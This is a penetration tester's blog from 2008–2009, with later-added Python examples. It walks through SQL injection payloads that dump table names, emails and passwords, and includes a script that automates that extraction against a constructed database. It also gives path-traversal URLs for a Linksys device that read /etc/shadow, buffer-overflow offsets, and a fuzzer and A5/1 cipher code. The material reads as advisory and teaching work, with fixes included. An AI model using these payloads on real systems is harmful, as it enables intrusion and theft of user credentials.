
Blind SQL Injection

16 Jun 2009

The infamous Blind SQL Injection vulnerability, regarded by some as the most difficult web application vulnerability to exploit. Recently, while performing a web application penetration test on a closed-source application, I discovered a Blind SQL Injection vulnerability and was able to exploit it to compromise the whole web application. Below is the process I used.

1. Discovering the vulnerability.
First break the query with stray quote characters, then make it return true:

Request : file.asp?id=1'"
Response: System error (Failed to execute query)

Request : file.asp?id=1' OR '1'='1
Response: Query returned true (page loaded)

Note: if a single quote does not break the query, try a double quote; if neither does, the parameter is probably used unquoted in a numeric context, so try 1 OR 1=1 without any quotes.

2. Attempt to determine what the query is doing. Will it be possible to return data in the page, or only to execute a query? It may be difficult to tell at this point. If it is only possible to execute queries, your best chance is updating or inserting an entry (a new account, for example); the principles below can still be used to achieve this.

3. Column counting
In order to construct a valid UNION query you need to know how many columns to select. There are a number of methods to achieve this; I find the ORDER BY clause the most efficient. ORDER BY accepts a column position as an integer, and the query fails as soon as that position exceeds the number of columns selected:

Request: file.asp?id=1' ORDER BY 1 --
Response: Query returned true (page loaded)

Request: file.asp?id=1' ORDER BY 2 --
Response: Query returned true (page loaded)

Request: file.asp?id=1' ORDER BY 3 --
Response: System error.

Since the final response was "System error", meaning the query failed, the number of columns selected is 2: the highest ORDER BY position that still returned true.

4. Constructing a valid UNION query
Before being able to execute a valid UNION query we need to determine the datatypes of the columns being selected. If a column is an INT and you UNION SELECT a VARCHAR into it, SQL Server cannot convert the string and the query fails. NULL (or 0 for numeric columns) is compatible with every column, so it is a safe placeholder; a real value is then substituted one column at a time:

Request: file.asp?id=1' UNION SELECT null, null --
Response: Query returned true (page loaded)

Request: file.asp?id=1' UNION SELECT @@version, null --
Response: System Error

Request: file.asp?id=1' UNION SELECT null, @@version --
Response: Query returned true (SQL Server version information returned)

Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
Copyright (c) 1988-2000 Microsoft Corporation
Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

In conclusion, the first column being selected is of a non-character datatype (most likely an integer identifier), and the second column is of a character datatype compatible with the version string; it is also the column the page renders. Note that once a UNION SELECT returns data in the page the injection is no longer blind in the strict sense; the true/false oracle was only needed to get this far.

5. Finding SQL server information
Now that I was able to construct a valid UNION query I wanted to return other information. I started by selecting the server name from master..sysservers:

Request : file.asp?id=1' UNION SELECT null, srvname FROM master..sysservers --
Response: Query returned true (Server name returned)

Following this I retrieved the current database user name. Note that in T-SQL "user" is a function returning the current user, so the FROM clause only supplies rows; to list the accounts themselves, select name FROM master..sysusers instead:
Request : file.asp?id=1' UNION SELECT null, user FROM master..sysusers --
Response: Query returned true (Database username returned)

6. Enumerating columns and tables
The below queries are straightforward. First I selected all table names, then all column names for a specific table.

All tables:
Request : file.asp?id=1' UNION SELECT null, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --
Response: Query returned true (All table names returned)

All columns for "tbl_MemberDetails":
Request : file.asp?id=1' UNION SELECT null, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='tbl_MemberDetails' --
Response: Query returned true (All column names for specified table returned)

7. Retrieving an account
Now that I had determined the table and columns I wanted, I constructed the queries below. "email" is the username field and "password" is the password field.

All email addresses:
Request : file.asp?id=1' UNION SELECT null, email FROM tbl_MemberDetails --
Response: Query returned true (All email addresses returned)
 
All passwords:
Request : file.asp?id=1' UNION SELECT null, password FROM tbl_MemberDetails --
Response: Query returned true (All passwords returned)
 
Password for a specific user:
Request : file.asp?id=1' UNION SELECT null, password FROM tbl_MemberDetails WHERE email='administrator@AAAAA.com' --
Response: Query returned true (Specific password returned)
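As an added example (not the original post's code), the column counting, rendered-column probe and UNION extraction of steps 3 to 7 automated in Python against a constructed, deliberately vulnerable query. SQLite stands in for SQL Server, so tbl_News, the sample rows, the sentinel value, sqlite_master and pragma_table_info (SQLite's stand-in for INFORMATION_SCHEMA) are all assumptions. SQLite does not raise on UNION type mismatches, so the datatype probe of step 4 is replaced by a sentinel probe that finds which column the page renders, which is the part of step 4 that matters for extraction; the probe also walks any number of columns rather than the two of the post. safe_page shows the fix, a parameterised query.

```python
import sqlite3

MARKER = "qzx7"   # constructed sentinel, unlikely to occur in real data


def build_db():
    """Constructed in-memory database standing in for the target's SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tbl_News (id INTEGER, title TEXT);
        INSERT INTO tbl_News VALUES (1, 'Welcome');
        CREATE TABLE tbl_MemberDetails (id INTEGER, email TEXT, password TEXT);
        INSERT INTO tbl_MemberDetails VALUES
            (1, 'administrator@example.com', 'Tr0ub4dor'),
            (2, 'user@example.com', 'hunter2');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """Models file.asp?id=...: the parameter is concatenated into the query and the
    second column is rendered. Returns None on a query error (the 'System error'
    response) or the rendered text (the 'page loaded' response)."""
    sql = "SELECT id, title FROM tbl_News WHERE id = '%s'" % id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "\n".join(str(row[1]) for row in rows)


def safe_page(conn, id_param):
    """The fix: a parameterised query, so the input never reaches the parser as SQL."""
    rows = conn.execute("SELECT id, title FROM tbl_News WHERE id = ?", (id_param,)).fetchall()
    return "\n".join(str(row[1]) for row in rows)


def count_columns(oracle, limit=32):
    """Step 3: the highest ORDER BY position that does not error is the column count."""
    count = 0
    for i in range(1, limit + 1):
        if oracle("1' ORDER BY %d --" % i) is None:
            break
        count = i
    return count


def find_rendered_column(oracle, ncols):
    """Step 4: put a sentinel in each UNION column in turn; the position whose
    sentinel shows up in the page is the one that can leak data."""
    for pos in range(ncols):
        cols = ["null"] * ncols
        cols[pos] = "'%s'" % MARKER
        page = oracle("0' UNION SELECT %s --" % ", ".join(cols))
        if page is not None and MARKER in page:
            return pos
    return None


def union_extract(oracle, ncols, pos, expr, from_clause=""):
    """Steps 5-7: select an expression into the rendered column. id=0 matches no
    real row, so only the UNIONed rows come back, one per line."""
    cols = ["null"] * ncols
    cols[pos] = expr
    page = oracle("0' UNION SELECT %s %s --" % (", ".join(cols), from_clause))
    return [] if page is None else page.splitlines()


def dump_members(conn):
    """Runs the whole procedure against the constructed target."""
    oracle = lambda payload: vulnerable_page(conn, payload)
    ncols = count_columns(oracle)
    pos = find_rendered_column(oracle, ncols)
    tables = union_extract(oracle, ncols, pos, "name",
                           "FROM sqlite_master WHERE type='table'")
    columns = union_extract(oracle, ncols, pos, "name",
                            "FROM pragma_table_info('tbl_MemberDetails')")
    creds = union_extract(oracle, ncols, pos, "email || ':' || password",
                          "FROM tbl_MemberDetails")
    return ncols, pos, tables, columns, creds


if __name__ == "__main__":
    print(dump_members(build_db()))
```

The oracle is the only target-specific part: against a real application it would be an HTTP request whose response is classified as "error" or "page loaded", and everything above it stays the same.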

In closing, I was able to obtain a number of user accounts. Before this I had never exploited a Blind SQL Injection vulnerability. The whole process took about an hour to complete.

Later this month I plan on releasing a basic shellcode encoder I wrote to assist in eliminating null bytes (and other bad characters) from shellcode. It's nothing compared to Metasploit; however, I recently went through a phase of learning to write Win32 shellcode. While writing the shellcode I attempted to eliminate the null bytes I knew would occur, but unfortunately it was still not null-byte free. So instead of adding extra operations to eliminate the null bytes I wrote an encoder/decoder.

When I release the pieces of shellcode I wrote, I will release a version with null bytes that uses a decoder, and a version without. I plan on releasing them this month...

It's been a while

26 Mar 2009

Been really busy of late. Started a new job as a penetration tester, began development on a few new apps, and thought about doing stuff I will never actually get around to doing. If only I never became tired.

FreeSSHd is an application I've been playing with for some time. The vulnerabilities I'd discovered I had never actually been able to exploit. Recently I decided to spend more time on the issues, and that time was put to good use: I managed to exploit the vulnerability, all of which can be viewed in the advisory titled "FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit".

Whilst setting up IP Phones early January I came across an issue with the Linksys SPA400 device:

Manufacturer Linksys (Division of Cisco Systems)
Device SPA400 (Internet Telephony Gateway)
Firmware 1.1.2.2

Provided the user is logged in, it is possible to read local files as the root user. The setup.cgi script passes the next_file parameter to the filesystem without verifying it before performing the action, so an absolute path to any file on the device is accepted. Examples are shown below:

/html/setup.cgi?next_file=/etc/passwd
/html/setup.cgi?next_file=/etc/shadow
/html/setup.cgi?next_file=/var/system.conf
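As an added example (not the device's code and not from the original post), the check that setup.cgi lacks, written in Python: vulnerable_read models handing next_file straight to the filesystem, while safe_read resolves the final path, symlinks included, and refuses anything outside the document root or outside an allowed set of file types. The directory layout, the www root, the ALLOWED_SUFFIXES list and the symlink case are constructed for the example.

```python
import os
import tempfile

ALLOWED_SUFFIXES = (".htm", ".html", ".css", ".js")   # assumed: what the web UI legitimately serves


def vulnerable_read(doc_root, next_file):
    """What the page reports setup.cgi doing: the parameter goes straight to the
    filesystem. os.path.join discards doc_root when next_file is absolute, and
    '..' components walk out of it."""
    with open(os.path.join(doc_root, next_file), "rb") as fh:
        return fh.read()


def safe_read(doc_root, next_file):
    """Resolve the real path and require it to stay inside doc_root and to name a
    regular file of a served type; anything else is refused. Returns None on refusal."""
    root = os.path.realpath(doc_root)
    target = os.path.realpath(os.path.join(root, next_file.lstrip("/")))
    if os.path.commonpath([root, target]) != root:      # escaped via '..' or a symlink
        return None
    if not target.endswith(ALLOWED_SUFFIXES) or not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def make_demo_root():
    """Constructed layout: <tmp>/www/index.htm inside the root, <tmp>/secret.txt
    outside it, and a symlink inside the root that points at the secret."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.mkdir(root)
    with open(os.path.join(root, "index.htm"), "w") as fh:
        fh.write("<h1>SPA400</h1>")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/sh")
    os.symlink(os.path.join(base, "secret.txt"), os.path.join(root, "link.htm"))
    return root


if __name__ == "__main__":
    root = make_demo_root()
    for name in ("index.htm", "../secret.txt", "link.htm", "/etc/passwd"):
        print(name, "->", safe_read(root, name))
```

The realpath step is what defeats the symlink case: a suffix or prefix check on the string alone would accept link.htm.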

Anyway, I hope to find much more time soon to do more vulnerability R&D and write more blog entries!

My latest advisory exploits a buffer overflow vulnerability in CoolPlayer. The vulnerability occurs when the "PlaylistSkin" variable is set to 1534 characters; the four bytes that follow (1538 in total) overwrite the saved return address, EIP. Besides a couple of security vulnerabilities CoolPlayer is a pretty cool app!

I've recently created version 2 of both my FormatFuzz and PacketFuzz fuzzers, which are currently private. FormatFuzz assisted in the discovery of bad allocation vulnerabilities in the Liferea RSS Reader (1.2.2) and RealPlayer (10.0.9.809 [gold]). PacketFuzz detected a stack overflow vulnerability in a Linksys WAG54G Wireless ADSL Router.

The bad allocation in Liferea occurs when a "title" tag contains around 5000 characters; the vulnerability is triggered when the user attempts to remove the subscription. In RealPlayer, the application crashes when it receives a "favorite" with an overly long string.
Proof of concept: liferea-badalloc.pl (Liferea)
Proof of concept: realplay-badalloc.pl (RealPlayer)

The stack overflow vulnerability in the Linksys WAG54G router occurs when the HTTPd service receives an overly long GET or POST request, of approximately 10240 characters. This vulnerability has been reported in various other Linksys products, but not, to date, in the WAG54G.
Proof of concept: wag54g-DoS.phps

I've been hesitant about posting the errors in Liferea, RealPlayer and the WAG54G for various reasons, so I doubt I'll release an advisory for those three, only for CoolPlayer. The others are just something fun to play with!

Just now as I was searching my vulnerability stockpile I found a file I had on FreeSSHd. It listed more vulnerable functions I'd discovered in the software. Basically every SFTP operation in the software is vulnerable to a buffer overflow! After JB's first FreeSSHd post I discontinued my research on the vulnerabilities.

Anyway Christmas (Thursday) is not very far away now - I'm definitely looking forward to having some time to relax.

Tonight I'll be releasing a multi-format fuzzer I wrote codenamed "TagFuzz". This fuzzer edits tag information of a supported file, then executes the target application supplying the file as an argument.

Supported file formats include: MP3, M4A, M4P, MP4, M4B, 3GP, OGG and FLAC.

TagFuzz also features the ability to spawn the target application as a child process, wait five seconds, then kill it. No more manual PID killing!

kit:/home/r0ut3r/tagfuzz # perl tagfuzz.pl -t realplay -f hittinhard.mp3
[!] Fuzzing process beginning [Target: realplay, File: hittinhard.mp3]
[+] Stage 0 [album]: ofnm

Note that the output "ofnm" refers to the pattern class recently completed. o = Overflow, f = FMTStrings, n = Numbers, m = MiscBugs.

Download: http://www.bmgsec.com.au/download/4/

I'm yet to have the time to search for bugs using this fuzzer.
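As an added example of the harness the post describes (this is not TagFuzz itself, whose source is at the download link above), a small Python fuzzer for one tag field: it writes the field as an ID3v2.3 text frame, since v2.3 frame bodies are length-prefixed and can be made as long as needed, prepends the tag to the audio, spawns the target on the file, and kills it after the timeout. The pattern classes follow the o/f/n/m letters of the status line, but the concrete payloads, the frame IDs used, the default field and the five-second timeout are this example's choices.

```python
import os
import subprocess
import sys
import tempfile

# Pattern classes behind the "ofnm" status letters; the payloads are assumptions.
PATTERN_CLASSES = {
    "o": ["A" * n for n in (128, 1024, 4096, 16384)],        # Overflow
    "f": ["%s" * 16, "%n" * 16, "%x" * 32, "%p%p%p%p"],        # FMTStrings
    "n": ["-1", "0", "65535", "2147483647", "-2147483648"],    # Numbers
    "m": ["\x00" * 16, "../" * 32, "\xff" * 64],               # MiscBugs
}

FRAME_IDS = {"title": "TIT2", "artist": "TPE1", "album": "TALB"}   # ID3v2.3 text frames


def syncsafe(n):
    """ID3v2 header sizes use 7 bits per byte so no byte looks like an MP3 sync marker."""
    return bytes(((n >> shift) & 0x7F) for shift in (21, 14, 7, 0))


def id3v2_tag(fields):
    """ID3v2.3 header plus one text frame per field. Frame sizes are plain big-endian
    in v2.3, so a frame body may be arbitrarily long: that is what lets an oversized
    album string reach a parser that copies it into a fixed-size buffer."""
    frames = b""
    for name, text in fields.items():
        body = b"\x00" + text.encode("latin-1")        # 0x00 = ISO-8859-1 encoding byte
        frames += FRAME_IDS[name].encode("ascii") + len(body).to_bytes(4, "big") + b"\x00\x00" + body
    return b"ID3\x03\x00\x00" + syncsafe(len(frames)) + frames


def parse_id3v2_frames(data):
    """Minimal reader used to check what was written; returns {frame_id: text}."""
    assert data[:3] == b"ID3"
    size = 0
    for b in data[6:10]:
        size = (size << 7) | (b & 0x7F)
    pos, end, out = 10, 10 + size, {}
    while pos + 10 <= end:
        fid = data[pos:pos + 4].decode("ascii")
        flen = int.from_bytes(data[pos + 4:pos + 8], "big")
        out[fid] = data[pos + 10:pos + 10 + flen][1:].decode("latin-1")
        pos += 10 + flen
    return out


def run_target(argv, timeout=5.0):
    """Spawn the target, wait at most `timeout` seconds, then kill it.
    Returns 'timeout', 'crash' (terminated by a signal on POSIX) or 'ok'."""
    try:
        proc = subprocess.run(argv, timeout=timeout,
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except subprocess.TimeoutExpired:          # run() has already killed the child
        return "timeout"
    return "crash" if proc.returncode < 0 else "ok"


def fuzz(target_argv, audio, field="album", classes="ofnm", timeout=5.0):
    """Walk the pattern classes for one tag field (the post's 'Stage 0 [album]: ofnm').
    Returns (class_letter, payload_length, result) for every run that was not 'ok'."""
    findings = []
    for letter in classes:
        for payload in PATTERN_CLASSES[letter]:
            tag = id3v2_tag({"title": "t", "artist": "a", field: payload})
            with tempfile.NamedTemporaryFile(suffix=".mp3", delete=False) as f:
                f.write(tag + audio)
                path = f.name
            try:
                result = run_target(target_argv + [path], timeout)
            finally:
                os.unlink(path)
            if result != "ok":
                findings.append((letter, len(payload), result))
    return findings


if __name__ == "__main__":
    # usage: python tagfuzz_example.py <player binary> <base.mp3>
    with open(sys.argv[2], "rb") as fh:
        audio = fh.read()
    for finding in fuzz([sys.argv[1]], audio):
        print("[!] class %s, %d-byte payload -> %s" % finding)
```

A base file that already carries an ID3v2 tag ends up with two; most players read the first, which is the fuzzed one, but stripping the original tag first removes the ambiguity.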

Over the coming weeks, or months I'll be releasing more of my private fuzzers. These include my SSH Fuzzer (which discovered vulnerabilities in FreeSSHd, and GoodTech SSH Server), SMTP Fuzzer, FormatFuzz (which discovered vulnerabilities in Intellitamper and W3C Amaya Web Browser), and more...

In regard to W3C Amaya, have a look at the registers after an overflow of the URL bar...

EAX 00000000
ECX 00000000
EDX 00000695
EBX 0013FD0C ASCII "AAAAAAAA..." <-- Before
ESP 0013F900 ASCII "CCCCCCCC..." <-- After my RET
EBP 00000007
ESI 0000939F
EDI 000091CD
EIP 42424242

Perfect conditions. It was a pity that some byte conversions caused problems when injecting opcodes, though. The same happens with the "id" property overflow.

During the creation of my website I decided to incorporate Google AdSense. All the research and applications I write I give away for free. Hopefully over time I will earn some money to help fund my research!

I've just released (available for download) implementations of the A5/1 stream cipher. This is the encryption algorithm used on GSM mobile networks, Telstra's included, to encrypt over-the-air traffic.

Quoted from the wiki page (http://en.wikipedia.org/wiki/A5/1):

A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified.

I've written two implementations which are functionally the same:

  1. PHP Version
  2. C# Version

Originally the PHP version was developed from a small script I created to demonstrate how the registers function. This later developed into a full implementation. At the time I required a C# version, so I rewrote it.
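As an added example, not the author's PHP or C# code, the same cipher in Python, showing the register mechanics the post's script set out to demonstrate: three LFSRs of 19, 22 and 23 bits with the published taps, key and frame loading, the 100 warm-up clocks, and the majority clocking rule that makes A5/1 irregular. The key, frame number and burst used in the usage section are constructed values.

```python
# A5/1 parameters: three LFSRs of 19, 22 and 23 bits, majority-clocked on
# bits 8, 10 and 10, with the published feedback taps and output bits.
R1_MASK, R2_MASK, R3_MASK = 0x07FFFF, 0x3FFFFF, 0x7FFFFF
R1_MID, R2_MID, R3_MID = 1 << 8, 1 << 10, 1 << 10
R1_TAPS, R2_TAPS, R3_TAPS = 0x072000, 0x300000, 0x700080   # bits 18,17,16,13 / 21,20 / 22,21,20,7
R1_OUT, R2_OUT, R3_OUT = 1 << 18, 1 << 21, 1 << 22


def parity(x):
    """XOR of all the bits of x."""
    return bin(x).count("1") & 1


def step(reg, mask, taps):
    """One LFSR clock: shift left, feed the XOR of the tapped bits into bit 0."""
    return ((reg << 1) & mask) | parity(reg & taps)


class A51:
    """Keystream generator; key is the 8-byte Kc, frame the 22-bit frame number."""

    def __init__(self, key, frame):
        self.r1 = self.r2 = self.r3 = 0
        for i in range(64):                        # key bits, LSB of each byte first
            self._load_bit((key[i >> 3] >> (i & 7)) & 1)
        for i in range(22):                        # frame bits, LSB first
            self._load_bit((frame >> i) & 1)
        for _ in range(100):                       # warm-up clocks, output discarded
            self._clock()

    def _load_bit(self, bit):
        """Initialisation: all three registers step and the bit is XORed into bit 0."""
        self.r1 = step(self.r1, R1_MASK, R1_TAPS) ^ bit
        self.r2 = step(self.r2, R2_MASK, R2_TAPS) ^ bit
        self.r3 = step(self.r3, R3_MASK, R3_TAPS) ^ bit

    def _clock(self):
        """Majority rule: a register steps only if its clocking bit agrees with the
        majority of the three clocking bits, so at least two registers move."""
        c1, c2, c3 = bool(self.r1 & R1_MID), bool(self.r2 & R2_MID), bool(self.r3 & R3_MID)
        maj = (c1 + c2 + c3) >= 2
        if c1 == maj:
            self.r1 = step(self.r1, R1_MASK, R1_TAPS)
        if c2 == maj:
            self.r2 = step(self.r2, R2_MASK, R2_TAPS)
        if c3 == maj:
            self.r3 = step(self.r3, R3_MASK, R3_TAPS)

    def keystream(self, nbits):
        """Clock, then output the XOR of the three registers' top bits, nbits times."""
        out = []
        for _ in range(nbits):
            self._clock()
            out.append(parity(self.r1 & R1_OUT) ^ parity(self.r2 & R2_OUT) ^ parity(self.r3 & R3_OUT))
        return out


def frame_keystreams(key, frame):
    """GSM draws 228 bits per frame: the first 114 encrypt the A->B burst, the next
    114 the B->A burst."""
    ks = A51(key, frame).keystream(228)
    return ks[:114], ks[114:]


def xor_bits(bits, ks):
    """Stream-cipher encryption and decryption are the same XOR."""
    return [b ^ k for b, k in zip(bits, ks)]


def bits_to_hex(bits):
    """Pack bits MSB-first into bytes for display."""
    out = bytearray((len(bits) + 7) // 8)
    for i, b in enumerate(bits):
        out[i >> 3] |= b << (7 - (i & 7))
    return out.hex()


if __name__ == "__main__":
    key = bytes.fromhex("1223456789abcdef")        # constructed test key
    a_to_b, b_to_a = frame_keystreams(key, 0x134)
    print("A->B:", bits_to_hex(a_to_b))
    print("B->A:", bits_to_hex(b_to_a))
```

Before relying on any A5/1 implementation, compare its output for a fixed key and frame against the test vector shipped with the pedagogical reference implementation by Briceno, Goldberg and Wagner; the bit-ordering conventions (LSB-first key loading, MSB-first output packing) above follow that code and are the usual place for mismatches.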

Alive

01 Nov 2008

I'm 85% of the way through creating software to manage blog entries. The software specification:

    * Post blog entries, and create blog entries
    * Blog entries can be created using TinyMCE (WYSIWYG) editor
    * Blog entries will be grouped by months, years

Eventually it will be available for download.